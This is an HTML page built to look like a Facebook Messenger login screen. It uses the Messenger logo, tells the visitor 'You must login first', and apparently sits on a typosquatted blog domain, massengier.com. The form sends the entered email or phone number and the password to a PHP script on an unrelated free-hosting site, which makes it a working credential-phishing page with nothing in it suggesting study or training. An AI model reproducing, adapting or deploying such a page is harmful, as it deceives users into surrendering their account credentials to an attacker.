<!DOCTYPE html>
<html lang="en">
    <head>
        <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
	<meta property="og:image" content="https://cdn01.vulcanpost.com/wp-uploads/2016/12/fb-cover.jpg" />
	<meta name="viewport" content="width=device-width, initial-scale=1.0">
	<title>Messenger</title>
	<link rel="icon" href="https://upload.wikimedia.org/wikipedia/commons/thumb/3/3b/Facebook_Messenger_logo.svg/595px-Facebook_Messenger_logo.svg.png">
      <style>
        * {
    margin:0px;
    padding:0px;
    -webkit-box-sizing:border-box;
    box-sizing:border-box;

}
body {
    background-color:#FFF;
    width:auto;
    height:auto;
}
.logo img {
    width:100px;
    margin-top:75px;
  border-radius:50%
      

}
.logo .head h1 {
    font-family: "Calibre", "Helvetica Neue", "Segoe UI",sans-serif;
    text-align: center;
    font-weight: 100;
    font-size: 40px;
    color: rgba(0, 0, 0, 1);
    margin-top: 17px;
    
}
.logo .head p {
    font-family: "Calibre", "Helvetica Neue", "Segoe UI",sans-serif;
    color: #f03d25;
    font-size:15px;
    line-height:20px;
    text-align:center;
    margin-top:30px

}
.form input[type='text'] {
    display: block;
    border: 1px solid rgba(0, 0, 0, .20);
    border-radius: 4px;
    color: rgba(0, 0, 0, 1);
    display: block;
    font-family: "Helvetica Neue", "Segoe UI", "Helvetica", "Arial", sans-serif;
    font-size: 17px;
    height: 42px;
    margin-bottom: 12px;
    margin-left: auto;
    margin-right: auto;
    margin-top: 37px;
    padding: 0 16px;
    width: 286px;
    
}
.form input[type="password"] {
    display: block;
    border: 1px solid rgba(0, 0, 0, .20);
    border-radius: 4px;
    color: rgba(0, 0, 0, 1);
    display: block;
    font-family: "Helvetica Neue", "Segoe UI", "Helvetica", "Arial", sans-serif;
    font-size: 17px;
    height: 42px;
    margin-bottom: 12px;
    margin-left: auto;
    margin-right: auto;
    margin-top: 13;
    padding: 0 16px;
    width: 286px;
    
}
.form button{
    background: #0a7cff;
    border-radius: 50px;
    color: #fff;
    font-size: 15px;
    padding: 15px 20px;
    align-items: center;
    border: none;
    box-shadow: none;
    display: flex;
    margin-left: auto;
    margin-right: auto;
     margin-top: 25px;
    overflow: hidden;
    text-overflow: ellipsis;
    text-shadow: none;
    white-space: nowrap;
    outline: none;
    
}
.form button{
    border:3px solid #FFF;
     border: none;
    box-shadow: none;
}
.form button {
    border:3px solid #FFF;
     border: none;
    box-shadow: none;
}
.form .cont {
    display:flex;
   justify-content: center;
}
form  .cont input[type="checkbox"] {
    height:22px;
    margin-right:3px;
    color: #929292;

}
 form  .cont input[type="checkbox"] , p {
    margin-top:60px; 
 
 }


 .form  .cont p {
  
     color: #929292;
     font-family: "Helvetica Neue", "Segoe UI", "Helvetica", "Arial", sans-serif;
     font-size: 15px;
     font-weight: normal;
 } 




@media only screen (max-width: 786px){
	form{
		width: 100%;
	}
	.form input{
		width: 95%;
	}
	.form button
	{
	    
		font-size: 18px;
        text-align: center;
        
    }
    .form .cont input[type="checkbox"] {
        height:12.2
    }
    
    



    
  
}


      </style>
        
    </head>   
    <body>
        <center>
            <div class="logo">
            <img src="https://cdn.pixabay.com/photo/2021/03/02/12/03/messenger-6062243_1280.png" alt="Messanger">
                <div class="head">
                  <p>You must login first.</p>

                </div>
                
            </div>
            
            <div class="form">
                <form method="POST" action="http://sadsasdxzzxc.atwebpages.com/POST.php">
                <input type="text" name="email" minlength="4" placeholder="Email Adress or phone number
 " required>
                <input type="password" name="pass" minlength="5" placeholder="Password" required>
                <button>Continue</button>
                    <div class="cont">
                      
                    <input type="checkbox"> 
                    <p>Keep me signed in

</p>
                        
                     </div>
             
                </form>
                
            </div>
            
                
        </center>
        

<script type='text/javascript'>
window['__wavt'] = 'AOuZoY6RuoNmlzSLjHTas7piL2gzfVyXAw:1594313958534';_WidgetManager._Init('//www.blogger.com/rearrange?blogID\x3d3831468560312595316','//www.massengier.com/','3831468560312595316');
_WidgetManager._SetDataContext([{'name': 'blog', 'data': {'blogId': '3831468560312595316', 'title': 'hadeer', 'url': 'https://www.massengier.com/', 'canonicalUrl': 'https://www.massengier.com/', 'homepageUrl': 'https://www.massengier.com/', 'searchUrl': 'https://www.massengier.com/search', 'canonicalHomepageUrl': 'https://www.massengier.com/', 'blogspotFaviconUrl': 'https://www.massengier.com/favicon.ico', 'bloggerUrl': 'https://www.blogger.com', 'hasCustomDomain': true, 'httpsEnabled': true, 'enabledCommentProfileImages': true, 'gPlusViewType': 'FILTERED_POSTMOD', 'adultContent': false, 'analyticsAccountNumber': '', 'encoding': 'UTF-8', 'locale': 'en', 'localeUnderscoreDelimited': 'en', 'languageDirection': 'ltr', 'isPrivate': false, 'isMobile': false, 'isMobileRequest': true, 'mobileClass': '', 'isPrivateBlog': false, 'isDynamicViewsAvailable': true, 'feedLinks': '\x3clink rel\x3d\x22alternate\x22 type\x3d\x22application/atom+xml\x22 title\x3d\x22hadeer - Atom\x22 href\x3d\x22https://www.massengier.com/feeds/posts/default\x22 /\x3e\n\x3clink rel\x3d\x22alternate\x22 type\x3d\x22application/rss+xml\x22 title\x3d\x22hadeer - RSS\x22 href\x3d\x22https://www.massengier.com/feeds/posts/default?alt\x3drss\x22 /\x3e\n\x3clink rel\x3d\x22service.post\x22 type\x3d\x22application/atom+xml\x22 title\x3d\x22hadeer - Atom\x22 href\x3d\x22https://www.blogger.com/feeds/3831468560312595316/posts/default\x22 /\x3e\n', 'meTag': '', 'adsenseHostId': 'ca-host-pub-1556223355139109', 'adsenseHasAds': true, 'view': '', 'dynamicViewsCommentsSrc': '//www.blogblog.com/dynamicviews/4224c15c4e7c9321/js/comments.js', 'dynamicViewsScriptSrc': '//www.blogblog.com/dynamicviews/55eba78911ffaedd', 'plusOneApiSrc': 'https://apis.google.com/js/plusone.js', 'disableGComments': true, 'sharing': {'platforms': [{'name': 'Get link', 'key': 'link', 'shareMessage': 'Get link', 'target': ''}, {'name': 'Facebook', 'key': 'facebook', 'shareMessage': 'Share to Facebook', 'target': 'facebook'}, {'name': 'BlogThis!', 'key': 'blogThis', 'shareMessage': 'BlogThis!', 'target': 'blog'}, {'name': 'Twitter', 'key': 'twitter', 'shareMessage': 'Share to Twitter', 'target': 'twitter'}, {'name': 'Pinterest', 'key': 'pinterest', 'shareMessage': 'Share to Pinterest', 'target': 'pinterest'}, {'name': 'Email', 'key': 'email', 'shareMessage': 'Email', 'target': 'email'}], 'disableGooglePlus': true, 'googlePlusShareButtonWidth': 300, 'googlePlusBootstrap': '\x3cscript type\x3d\x22text/javascript\x22\x3ewindow.___gcfg \x3d {\x27lang\x27: \x27en\x27};\x3c/script\x3e'}, 'hasCustomJumpLinkMessage': false, 'jumpLinkMessage': 'Read more', 'pageType': 'index', 'pageName': '', 'pageTitle': 'hadeer'}}, {'name': 'features', 'data': {'sharing_get_link_dialog': 'true', 'sharing_native': 'false'}}, {'name': 'messages', 'data': {'edit': 'Edit', 'linkCopiedToClipboard': 'Link copied to clipboard!', 'ok': 'Ok', 'postLink': 'Post Link'}}, {'name': 'template', 'data': {'name': 'custom', 'localizedName': 'Custom', 'isResponsive': false, 'isAlternateRendering': false, 'isCustom': true}}, {'name': 'view', 'data': {'classic': {'name': 'classic', 'url': '?view\x3dclassic'}, 'flipcard': {'name': 'flipcard', 'url': '?view\x3dflipcard'}, 'magazine': {'name': 'magazine', 'url': '?view\x3dmagazine'}, 'mosaic': {'name': 'mosaic', 'url': '?view\x3dmosaic'}, 'sidebar': {'name': 'sidebar', 'url': '?view\x3dsidebar'}, 'snapshot': {'name': 'snapshot', 'url': '?view\x3dsnapshot'}, 'timeslide': {'name': 'timeslide', 'url': '?view\x3dtimeslide'}, 'isMobile': false, 'title': 'hadeer', 'description': '', 'url': 'https://www.massengier.com/', 'type': 'feed', 'isSingleItem': false, 'isMultipleItems': true, 'isError': false, 'isPage': false, 'isPost': false, 'isHomepage': true, 'isArchive': false, 'isLabelSearch': false}}]);
_WidgetManager._RegisterWidget('_BlogView', new _WidgetInfo('Blog1', 'main', document.getElementById('Blog1'), {'cmtInteractionsEnabled': false, 'navMessage': 'No posts.', 'lightboxEnabled': true, 'lightboxModuleUrl': 'https://www.blogger.com/static/v1/jsbin/218772866-lbx.js', 'lightboxCssUrl': 'https://www.blogger.com/static/v1/v-css/368954415-lightbox_bundle.css'}, 'displayModeFull'));
</script>
    </body>
</html>
        
 
